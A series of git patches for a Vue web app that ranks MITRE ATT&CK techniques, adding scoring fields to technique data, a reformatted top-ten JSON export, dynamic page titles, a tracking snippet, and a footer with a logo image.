-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1598",
@@ -18944,7 +19450,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.13333333333333333,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1599",
@@ -19083,7 +19592,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.3047619047619048,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1600",
@@ -19133,7 +19645,9 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1601",
@@ -19321,7 +19835,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.36190476190476195,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1602",
@@ -19526,7 +20043,10 @@
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.380952380952381,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1606",
@@ -19666,7 +20186,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.1523809523809524,
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0
     },
     {
         "tid": "T1608",
@@ -19782,7 +20305,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.0047619047619047615,
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
     },
     {
         "tid": "T1609",
@@ -19844,7 +20370,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.0047619047619047615,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1610",
@@ -19911,7 +20440,10 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.028571428571428567,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1611",
@@ -19988,7 +20520,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": true,
-        "hardware_coverage": true
+        "hardware_coverage": true,
+        "actionability_score": 0.028571428571428567,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1612",
@@ -20104,7 +20639,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.009523809523809523,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1614",
@@ -20152,7 +20690,10 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.0047619047619047615,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1615",
@@ -20189,7 +20730,10 @@
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.019047619047619046,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1619",
@@ -20238,7 +20782,9 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": true,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
         "tid": "T1620",
@@ -20275,6 +20821,9 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false
+        "hardware_coverage": false,
+        "actionability_score": 0.0047619047619047615,
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     }
 ]
\ No newline at end of file
diff --git a/src/views/TopTenResults.vue b/src/views/TopTenResults.vue
index efa8bc7..e4140a2 100644
--- a/src/views/TopTenResults.vue
+++ b/src/views/TopTenResults.vue
@@ -43,7 +43,7 @@ import TopTenDetails from "../components/TopTenDetails.vue"
 import TopTenAccordion from "../components/TopTenAccordion.vue"
 import SystemScoreSection from "../components/SystemScoreSection.vue"
 import downloadjs from "downloadjs";
-import { type Technique } from "../data/DataTypes"
+import type { ExportedTechnique, Technique } from "@/data/DataTypes";
 
 export default defineComponent({
     components: { TopTenSidebar, TopTenDetails, TopTenAccordion, SystemScoreSection },
@@ -73,7 +73,32 @@ export default defineComponent({
             }
         },
         download() {
-            downloadjs(JSON.stringify(this.rankedList.slice(0, 10)), "TopTenTechniques.json", JSON)
+            const parsedList = [] as Array;
+
+            this.rankedList.slice(0, 10).forEach((technique, i) => {
+                const t = {
+                    rank: i + 1,
+                    tid: technique.tid,
+                    name: technique.name,
+                    description: technique.description,
+                    url: technique.url,
+                    detection: technique.detection,
+                    score: technique.adjusted_score,
+                    network_score: technique.network_score,
+                    process_score: technique.process_score,
+                    file_score: technique.file_score,
+                    cloud_score: technique.cloud_score,
+                    hardware_score: technique.hardware_score,
+                    mitigations: technique.mitigations,
+                    subtechniques: technique.subtechniques,
+                    actionability_score: technique.actionability_score,
+                    choke_point_score: technique.choke_point_score,
+                    prevalence_score: technique.prevalence_score,
+                }
+                parsedList.push(t);
+            })
+
+            downloadjs(JSON.stringify(parsedList, null, 4), "TopTenTechniques.json", JSON)
         },
         setRankedList() {
             let filteredList = structuredClone(toRaw(this.calculatorStore.techniques));

From 360402de9df8880180c6f76334be12442bdcf7a7 Mon Sep 17 00:00:00 2001
From: Allison Robbins 
Date: Fri, 31 May 2024 14:58:22 -0400
Subject: [PATCH 09/21] TAT-141 dynamic page titles (#17)

* feat(TAT-141): set dynamic page titles based on route

* feat(TAT-141): reference meta.title property to display page name instead of name property

* feat(TAT-141): use nextTick for dynamic page title code

---------

Co-authored-by: arobbins 
---
 index.html          |  2 +-
 src/router/index.ts | 18 ++++++++++++++++--
 2 files changed, 17 insertions(+), 3 deletions(-)

diff --git a/index.html b/index.html
index a966151..84f20ba 100644
--- a/index.html
+++ b/index.html
@@ -15,7 +15,7 @@
       rel="stylesheet"
     />
 
-    Vite App
+    Top ATT&CK Techniques
   
 
   
diff --git a/src/router/index.ts b/src/router/index.ts
index 6dc8e15..25863eb 100644
--- a/src/router/index.ts
+++ b/src/router/index.ts
@@ -5,36 +5,42 @@ import TopTen from "@/views/TopTen.vue";
 import HelpPage from "@/views/HelpPage.vue";
 import TopTenResults from "../views/TopTenResults.vue";
 import CalculatorPage from "../views/CalculatorPage.vue";
+import { nextTick } from "vue";
 const routes = [
   {
     path: "/",
-    name: "home",
+    name: "",
     component: HomePage,
   },
   {
     path: "/methodology",
     name: "methodology",
     component: MethodologyPage,
+    meta: { title: "Methodology" },
   },
   {
     path: "/help",
     name: "help",
     component: HelpPage,
+    meta: { title: "Help" },
   },
   {
     path: "/calculator",
     name: "calculator",
     component: CalculatorPage,
+    meta: { title: "Calculator" },
   },
   {
     path: "/top-10-lists",
-    name: "top-10-lists",
+    name: "top-ten-lists",
     component: TopTen,
+    meta: { title: "Top 10 Lists" },
   },
   {
     path: "/calculator/results",
     name: "calculator-results",
     component: TopTenResults,
+    meta: { title: "Calculator Results" },
   },
 ];
 
@@ -47,4 +53,12 @@ const router = createRouter({
   },
 });
 
+router.afterEach((to) => {
+  nextTick(() => {
+    document.title = to.meta.title
+      ? to.meta.title + " | Top ATT&CK Techniques"
+      : "Top ATT&CK Techniques";
+  });
+});
+
 export { router };

From c1a893c0180029827ddd2b0965e5bb0f22d35ba7 Mon Sep 17 00:00:00 2001
From: Allison Robbins 
Date: Mon, 3 Jun 2024 12:01:28 -0400
Subject: [PATCH 10/21] feat(TAT-148): add google tracking code to the
 inde.html (#20)

Co-authored-by: arobbins 
---
 index.html | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/index.html b/index.html
index 84f20ba..9eaca24 100644
--- a/index.html
+++ b/index.html
@@ -17,7 +17,20 @@
 
     Top ATT&CK Techniques
   
+  
+  
+  
   
     

     

From 3c48f42f0ad39bfd7f86dd77beb51826ebe84a0b Mon Sep 17 00:00:00 2001
From: Allison Robbins 
Date: Mon, 3 Jun 2024 12:01:54 -0400
Subject: [PATCH 11/21] TAT-143 add footer to application pages (#18)

* feat(TAT-143): add footer to application pages

* feat(TAT-143): link to related external projects instead of to pages within SPA

* refactor(TAT143): fix attack flow spelling

* feat(TAT-143): update subject line of email link

* refactor(TAT-143): remove ampersand

---------

Co-authored-by: arobbins 
---
 src/App.vue                          |   4 +-
 src/assets/logo-horizontal-white.png | Bin 0 -> 22529 bytes
 src/components/NavigationFooter.vue  |  92 +++++++++++++++++++++++++++
 3 files changed, 95 insertions(+), 1 deletion(-)
 create mode 100644 src/assets/logo-horizontal-white.png
 create mode 100644 src/components/NavigationFooter.vue

diff --git a/src/App.vue b/src/App.vue
index ba44de3..87fe04c 100644
--- a/src/App.vue
+++ b/src/App.vue
@@ -1,16 +1,18 @@
 
 
 
diff --git a/src/assets/logo-horizontal-white.png b/src/assets/logo-horizontal-white.png
new file mode 100644
index 0000000000000000000000000000000000000000..cbc6b0b331af56c7703b6a9e19ad8a3850130285
GIT binary patch
literal 22529
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
